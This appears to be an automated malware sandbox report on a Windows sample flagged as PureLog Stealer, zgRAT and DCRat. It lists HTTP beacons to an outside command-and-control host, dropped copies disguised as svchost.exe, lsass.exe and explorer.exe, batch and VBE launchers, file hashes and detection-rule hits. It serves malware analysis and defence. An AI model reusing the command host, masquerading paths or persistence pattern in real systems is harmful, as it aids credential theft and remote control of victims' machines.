                                                          Oct 1, 2024 05:58:59.137186050 CEST1120OUTData Raw: 58 52 5a 59 59 40 54 5e 5c 58 57 5a 54 5e 55 58 59 5b 59 5b 50 5d 56 47 5b 5e 41 59 55 57 58 5d 41 58 54 50 5b 5f 54 58 58 53 55 53 5f 54 5f 5c 5b 5c 58 59 5f 59 51 54 54 5c 55 55 57 50 56 49 5b 51 59 5f 5a 52 50 55 42 5f 5e 56 5a 5d 5f 5e 5a 5d
                                                          Data Ascii: XRZYY@T^\XWZT^UXY[Y[P]VG[^AYUWX]AXTP[_TXXSUS_T_\[\XY_YQTT\UUWPVI[QY_ZRPUB_^VZ]_^Z]PPRD[_WVZUXYWYQRXP]Z^W^[FXYZ[^\TW]FYZQYAX\W^X]U\]YZ][X]U^RYGX_Z]Q\PX\YGYYZ__R[XWX[YW_T_^_TV]YW^\^Y_VPT!]93S";8):'>*^%X,U7V'+1">P$4>Z(7(!F/'P,=
                                                          Oct 1, 2024 05:58:59.448971033 CEST25INHTTP/1.1 100 Continue
                                                          Oct 1, 2024 05:58:59.577435017 CEST158INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Tue, 01 Oct 2024 03:58:59 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3c 55 5c 50
                                                          Data Ascii: <U\P
                                                          Oct 1, 2024 05:58:59.809401035 CEST158INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Tue, 01 Oct 2024 03:58:59 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3c 55 5c 50
                                                          Data Ascii: <U\P


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          109192.168.2.64982137.44.238.250801924C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          TimestampBytes transferredDirectionData
                                                          Oct 1, 2024 05:58:59.811001062 CEST347OUTPOST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                          Host: 664930cm.n9shka.top
                                                          Content-Length: 1120
                                                          Expect: 100-continue
                                                          Oct 1, 2024 05:59:00.169488907 CEST1120OUTData Raw: 5d 56 5f 55 59 44 51 52 5c 58 57 5a 54 5a 55 5c 59 52 59 5c 50 5d 56 41 5b 5e 41 59 55 57 58 5d 41 58 54 50 5b 5f 54 58 58 53 55 53 5f 54 5f 5c 5b 5c 58 59 5f 59 51 54 54 5c 55 55 57 50 56 49 5b 51 59 5f 5a 52 50 55 42 5f 5e 56 5a 5d 5f 5e 5a 5d
                                                          Data Ascii: ]V_UYDQR\XWZTZU\YRY\P]VA[^AYUWX]AXTP[_TXXSUS_T_\[\XY_YQTT\UUWPVI[QY_ZRPUB_^VZ]_^Z]PPRD[_WVZUXYWYQRXP]Z^W^[FXYZ[^\TW]FYZQYAX\W^X]U\]YZ][X]U^RYGX_Z]Q\PX\YGYYZ__R[XWX[YW_T_^_TV]YW^\^Y_VPT"9#7W +?="0>-&;X/(0.<P&"2P$$2??(9!F/'P,-
                                                          Oct 1, 2024 05:59:00.448160887 CEST25INHTTP/1.1 100 Continue
                                                          Oct 1, 2024 05:59:00.586829901 CEST158INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Tue, 01 Oct 2024 03:59:00 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3c 55 5c 50
                                                          Data Ascii: <U\P


                                                          Statistics

                                                          CPU Usage

                                                          Click to jump to process

                                                          Memory Usage

                                                          Click to jump to process

                                                          High Level Behavior Distribution

                                                          Click to dive into process behavior distribution

                                                          Behavior

                                                          Click to jump to process

                                                          System Behavior

                                                          General

                                                          Target ID:0
                                                          Start time:23:56:53
                                                          Start date:30/09/2024
                                                          Path:C:\Users\user\Desktop\Zn0uX5K1ez.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Users\user\Desktop\Zn0uX5K1ez.exe"
                                                          Imagebase:0xb10000
                                                          File size:8'034'816 bytes
                                                          MD5 hash:58509394A423EDB98B0B1BE7F18551AB
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000000.2096226398.0000000000B12000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.2119459063.0000000004625000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          Reputation:low
                                                          Has exited:true

                                                          General

                                                          Target ID:2
                                                          Start time:23:56:54
                                                          Start date:30/09/2024
                                                          Path:C:\Users\user\AppData\Local\Temp\svchost.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Users\user\AppData\Local\Temp\svchost.exe"
                                                          Imagebase:0x830000
                                                          File size:2'238'090 bytes
                                                          MD5 hash:A87CB2A1E23600C28C1A8E6A5C6A1C52
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000002.00000003.2104402669.0000000006800000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000002.00000003.2103951252.0000000006000000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Users\user\AppData\Local\Temp\svchost.exe, Author: Joe Security
                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\AppData\Local\Temp\svchost.exe, Author: Joe Security
                                                          Antivirus matches:
                                                          • Detection: 100%, Avira
                                                          • Detection: 100%, Joe Sandbox ML
                                                          • Detection: 75%, ReversingLabs
                                                          • Detection: 59%, Virustotal, Browse
                                                          Reputation:low
                                                          Has exited:true

                                                          General

                                                          Target ID:3
                                                          Start time:23:56:54
                                                          Start date:30/09/2024
                                                          Path:C:\Users\user\AppData\Local\Temp\explorer.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Users\user\AppData\Local\Temp\explorer.exe"
                                                          Imagebase:0x140000000
                                                          File size:5'736'960 bytes
                                                          MD5 hash:52AAA8C3FD6B813B713AE05AB9E4829C
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Antivirus matches:
                                                          • Detection: 100%, Joe Sandbox ML
                                                          • Detection: 71%, ReversingLabs
                                                          • Detection: 65%, Virustotal, Browse
                                                          Reputation:low
                                                          Has exited:false

                                                          General

                                                          Target ID:4
                                                          Start time:23:56:54
                                                          Start date:30/09/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff66e660000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:false

                                                          General

                                                          Target ID:5
                                                          Start time:23:56:54
                                                          Start date:30/09/2024
                                                          Path:C:\Windows\SysWOW64\wscript.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Windows\System32\WScript.exe" "C:\blockhostnet\dbHnJe8FTGPofdGpjq0jOMhg.vbe"
                                                          Imagebase:0x50000
                                                          File size:147'456 bytes
                                                          MD5 hash:FF00E0480075B095948000BDC66E81F0
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          General

                                                          Target ID:6
                                                          Start time:23:56:55
                                                          Start date:30/09/2024
                                                          Path:C:\Windows\System32\cmd.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\cmd.exe /c cls
                                                          Imagebase:0x7ff6d9880000
                                                          File size:289'792 bytes
                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          General

                                                          Target ID:8
                                                          Start time:23:57:19
                                                          Start date:30/09/2024
                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:C:\Windows\system32\cmd.exe /c ""C:\blockhostnet\iXSXm.bat" "
                                                          Imagebase:0x1c0000
                                                          File size:236'544 bytes
                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          General

                                                          Target ID:9
                                                          Start time:23:57:19
                                                          Start date:30/09/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff66e660000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          General

                                                          Target ID:10
                                                          Start time:23:57:19
                                                          Start date:30/09/2024
                                                          Path:C:\blockhostnet\msinto.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\blockhostnet/msinto.exe"
                                                          Imagebase:0xa00000
                                                          File size:1'916'416 bytes
                                                          MD5 hash:83152560524B250C6C27561117DF37FE
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 0000000A.00000002.2399954472.000000001312B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000A.00000000.2352080688.0000000000A02000.00000002.00000001.01000000.0000000D.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\blockhostnet\msinto.exe, Author: Joe Security
                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\blockhostnet\msinto.exe, Author: Joe Security
                                                          Antivirus matches:
                                                          • Detection: 75%, ReversingLabs
                                                          • Detection: 56%, Virustotal, Browse
                                                          Reputation:low
                                                          Has exited:true

                                                          General

                                                          Target ID:11
                                                          Start time:23:57:21
                                                          Start date:30/09/2024
                                                          Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\bpgiaqs4\bpgiaqs4.cmdline"
                                                          Imagebase:0x7ff633790000
                                                          File size:2'759'232 bytes
                                                          MD5 hash:F65B029562077B648A6A5F6A1AA76A66
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:moderate
                                                          Has exited:true

                                                          General

                                                          Target ID:12
                                                          Start time:23:57:21
                                                          Start date:30/09/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff66e660000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          General

                                                          Target ID:13
                                                          Start time:23:57:21
                                                          Start date:30/09/2024
                                                          Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESB3CA.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSC35F53CF7FFB422D917B12E88668AC1.TMP"
                                                          Imagebase:0x7ff699030000
                                                          File size:52'744 bytes
                                                          MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:moderate
                                                          Has exited:true

                                                          General

                                                          Target ID:14
                                                          Start time:23:57:21
                                                          Start date:30/09/2024
                                                          Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\tcgkwiyn\tcgkwiyn.cmdline"
                                                          Imagebase:0x7ff633790000
                                                          File size:2'759'232 bytes
                                                          MD5 hash:F65B029562077B648A6A5F6A1AA76A66
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:moderate
                                                          Has exited:true

                                                          General

                                                          Target ID:15
                                                          Start time:23:57:21
                                                          Start date:30/09/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff66e660000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          General

                                                          Target ID:16
                                                          Start time:23:57:22
                                                          Start date:30/09/2024
                                                          Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESB531.tmp" "c:\Windows\System32\CSCEBFD873D95F4D378C8CAFD01222E4F7.TMP"
                                                          Imagebase:0x7ff699030000
                                                          File size:52'744 bytes
                                                          MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:17
                                                          Start time:23:57:22
                                                          Start date:30/09/2024
                                                          Path:C:\Windows\System32\cmd.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\klrkJh2DBx.bat"
                                                          Imagebase:0x7ff6d9880000
                                                          File size:289'792 bytes
                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:18
                                                          Start time:23:57:22
                                                          Start date:30/09/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff66e660000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:19
                                                          Start time:23:57:22
                                                          Start date:30/09/2024
                                                          Path:C:\Windows\System32\chcp.com
                                                          Wow64 process (32bit):false
                                                          Commandline:chcp 65001
                                                          Imagebase:0x7ff7f2680000
                                                          File size:14'848 bytes
                                                          MD5 hash:33395C4732A49065EA72590B14B64F32
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:20
                                                          Start time:23:57:22
                                                          Start date:30/09/2024
                                                          Path:C:\Windows\System32\w32tm.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                                          Imagebase:0x7ff7a2b70000
                                                          File size:108'032 bytes
                                                          MD5 hash:81A82132737224D324A3E8DA993E2FB5
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:21
                                                          Start time:23:57:27
                                                          Start date:30/09/2024
                                                          Path:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Program Files (x86)\msbuild\Microsoft\Windows Workflow Foundation\conhost.exe"
                                                          Imagebase:0x10000
                                                          File size:1'916'416 bytes
                                                          MD5 hash:83152560524B250C6C27561117DF37FE
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000015.00000002.3361148000.000000000294B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000015.00000002.3361148000.0000000002AE0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000015.00000002.3361148000.0000000002651000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe, Author: Joe Security
                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe, Author: Joe Security
                                                          Antivirus matches:
                                                          • Detection: 100%, Avira
                                                          • Detection: 100%, Joe Sandbox ML
                                                          • Detection: 75%, ReversingLabs
                                                          • Detection: 56%, Virustotal, Browse
                                                          Has exited:false

                                                          General

                                                          Target ID:24
                                                          Start time:23:57:31
                                                          Start date:30/09/2024
                                                          Path:C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exe"
                                                          Imagebase:0x80000
                                                          File size:1'916'416 bytes
                                                          MD5 hash:83152560524B250C6C27561117DF37FE
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exe, Author: Joe Security
                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exe, Author: Joe Security
                                                          Antivirus matches:
                                                          • Detection: 100%, Avira
                                                          • Detection: 100%, Joe Sandbox ML
                                                          • Detection: 75%, ReversingLabs
                                                          • Detection: 56%, Virustotal, Browse
                                                          Has exited:true

                                                          General

                                                          Target ID:26
                                                          Start time:23:57:42
                                                          Start date:30/09/2024
                                                          Path:C:\Recovery\lsass.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Recovery\lsass.exe"
                                                          Imagebase:0xe00000
                                                          File size:1'916'416 bytes
                                                          MD5 hash:83152560524B250C6C27561117DF37FE
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Recovery\lsass.exe, Author: Joe Security
                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Recovery\lsass.exe, Author: Joe Security
                                                          Antivirus matches:
                                                          • Detection: 100%, Avira
                                                          • Detection: 100%, Joe Sandbox ML
                                                          • Detection: 75%, ReversingLabs
                                                          • Detection: 56%, Virustotal, Browse
                                                          Has exited:true

                                                          General

                                                          Target ID:27
                                                          Start time:23:57:53
                                                          Start date:30/09/2024
                                                          Path:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Program Files (x86)\msbuild\Microsoft\Windows Workflow Foundation\conhost.exe"
                                                          Imagebase:0xba0000
                                                          File size:1'916'416 bytes
                                                          MD5 hash:83152560524B250C6C27561117DF37FE
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:28
                                                          Start time:23:58:01
                                                          Start date:30/09/2024
                                                          Path:C:\Windows\debug\explorer.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Windows\debug\explorer.exe"
                                                          Imagebase:0xa0000
                                                          File size:1'916'416 bytes
                                                          MD5 hash:83152560524B250C6C27561117DF37FE
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Windows\debug\explorer.exe, Author: Joe Security
                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Windows\debug\explorer.exe, Author: Joe Security
                                                          Antivirus matches:
                                                          • Detection: 100%, Avira
                                                          • Detection: 100%, Joe Sandbox ML
                                                          • Detection: 75%, ReversingLabs
                                                          • Detection: 56%, Virustotal, Browse
                                                          Has exited:true

                                                          General

                                                          Target ID:30
                                                          Start time:23:58:18
                                                          Start date:30/09/2024
                                                          Path:C:\blockhostnet\msinto.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\blockhostnet\msinto.exe"
                                                          Imagebase:0xa20000
                                                          File size:1'916'416 bytes
                                                          MD5 hash:83152560524B250C6C27561117DF37FE
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:31
                                                          Start time:23:58:26
                                                          Start date:30/09/2024
                                                          Path:C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exe"
                                                          Imagebase:0x450000
                                                          File size:1'916'416 bytes
                                                          MD5 hash:83152560524B250C6C27561117DF37FE
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:32
                                                          Start time:23:58:34
                                                          Start date:30/09/2024
                                                          Path:C:\Recovery\lsass.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Recovery\lsass.exe"
                                                          Imagebase:0x600000
                                                          File size:1'916'416 bytes
                                                          MD5 hash:83152560524B250C6C27561117DF37FE
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:33
                                                          Start time:23:58:42
                                                          Start date:30/09/2024
                                                          Path:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Program Files (x86)\msbuild\Microsoft\Windows Workflow Foundation\conhost.exe"
                                                          Imagebase:0x730000
                                                          File size:1'916'416 bytes
                                                          MD5 hash:83152560524B250C6C27561117DF37FE
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:34
                                                          Start time:23:58:50
                                                          Start date:30/09/2024
                                                          Path:C:\Windows\debug\explorer.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Windows\debug\explorer.exe"
                                                          Imagebase:0xbd0000
                                                          File size:1'916'416 bytes
                                                          MD5 hash:83152560524B250C6C27561117DF37FE
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:false

                                                          Disassembly

                                                          Reset < >

                                                            Executed Functions

                                                            Function 03441690 Relevance: 1.1, Instructions: 1114COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2119314969.0000000003440000.00000040.00000800.00020000.00000000.sdmp, Offset: 03440000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_3440000_Zn0uX5K1ez.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 2bffd67107591f78218734182e0484e9ad77e28c67f92d3053ec18d87baf3034
                                                            • Instruction ID: bd473801df6dd5177ba7c406c474570142a0b0504de55db4d0f9ab77b182de74
                                                            • Opcode Fuzzy Hash: 2bffd67107591f78218734182e0484e9ad77e28c67f92d3053ec18d87baf3034
                                                            • Instruction Fuzzy Hash: E08289358202558FDB75CFBCC8CB7AA77A1FF05204B1949A9CCC69F25BE631D4068B86
                                                            Function 034409B0 Relevance: .4, Instructions: 449COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2119314969.0000000003440000.00000040.00000800.00020000.00000000.sdmp, Offset: 03440000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_3440000_Zn0uX5K1ez.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 6c28d9e006d8d44a53bb5a9d6ebf609cfe863391477d47e19da69674706f159f
                                                            • Instruction ID: 501c9901c0aa93f11caf62bbf1c21edec217bf23baf4f91474ec3637dc756e24
                                                            • Opcode Fuzzy Hash: 6c28d9e006d8d44a53bb5a9d6ebf609cfe863391477d47e19da69674706f159f
                                                            • Instruction Fuzzy Hash: A7326874E012298FDB64DF69D994B9DBBB2BB49300F1481EAD80DA7354EB309E85CF11
                                                            Function 03447AFF Relevance: .3, Instructions: 342COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2119314969.0000000003440000.00000040.00000800.00020000.00000000.sdmp, Offset: 03440000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_3440000_Zn0uX5K1ez.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 50caf018d175bd414f0d416af043040115d696f1ea72aeed7776d70ab43aebae
                                                            • Instruction ID: 7fa2e27b21eb7ef01b7169444575af4fbd5b1822151be45ff81dbdb8794ca15a
                                                            • Opcode Fuzzy Hash: 50caf018d175bd414f0d416af043040115d696f1ea72aeed7776d70ab43aebae
                                                            • Instruction Fuzzy Hash: A2D15030A006058FDB25DF78D4546AEBBF2FFC8700F288529D516AB394DB349D46CB95
                                                            Function 034495A8 Relevance: .2, Instructions: 178COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2119314969.0000000003440000.00000040.00000800.00020000.00000000.sdmp, Offset: 03440000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_3440000_Zn0uX5K1ez.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 00dd4b53bbd1ba9b8d3ca036ab2f919d598f872dc39148b6e3508ae802f412db
                                                            • Instruction ID: 4ae280b21fc0b3ad291a648c323ba0249a577ba333a62fc6f5775357a3900aa6
                                                            • Opcode Fuzzy Hash: 00dd4b53bbd1ba9b8d3ca036ab2f919d598f872dc39148b6e3508ae802f412db
                                                            • Instruction Fuzzy Hash: F7516F39355151CFC76AEB64999917E37A3ABC560074C00A9D857CB388DF249E03DFCA
                                                            Function 034492E8 Relevance: .2, Instructions: 173COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2119314969.0000000003440000.00000040.00000800.00020000.00000000.sdmp, Offset: 03440000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_3440000_Zn0uX5K1ez.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: cfcab965ea774742ea1867efbb582c05e68076ec52b1f91a77ade7e447ce7862
                                                            • Instruction ID: eda1c050642698865e9078db946a7467e206444001299d6a3e89c2cc97efdb38
                                                            • Opcode Fuzzy Hash: cfcab965ea774742ea1867efbb582c05e68076ec52b1f91a77ade7e447ce7862
                                                            • Instruction Fuzzy Hash: 4E5192307081158FEB29AA75A85423F769BAFC6A4071C443ED407CF385DF68CD079B99
                                                            Function 0344D60B Relevance: .1, Instructions: 59COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
